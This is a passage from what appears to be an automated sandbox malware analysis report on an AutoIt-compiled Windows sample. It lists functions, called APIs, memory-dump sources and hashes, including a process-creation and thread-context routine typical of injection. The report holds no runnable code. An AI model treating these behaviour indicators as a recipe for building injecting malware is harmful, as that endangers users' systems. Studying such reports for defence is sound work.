                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1794320848-0
                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                          Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2429186680-0
                                                                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                          Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 680241177-0
                                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                          Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                          • _free.LIBCMT ref: 004295A0
                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 3938964917-2806939583
                                                                          • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                          • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                          Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _strcat
                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                          • API String ID: 1765576173-2684727018
                                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                          Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                          • String ID:
                                                                          • API String ID: 4163294574-0
                                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                          Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                          • _strcat.LIBCMT ref: 0040F786
                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3199840319-0
                                                                          • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                          • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                          Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                          • String ID:
                                                                          • API String ID: 3403648963-0
                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                          Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                          Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                          Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                          Function 04197AFD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                          • Instruction ID: 41593a7b7fa6221b7454b14fbe50521e38db48ea0e688fb9ab140a5e6643f5c3
                                                                          • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                          • Instruction Fuzzy Hash: 9112DE20E24658C6EB24DF64D8507DEB272EF68300F1094E9D10DEB7A4E77A5F81CB5A
                                                                          Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                          • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                          Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                          • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                          • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                          • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                          Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                          Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
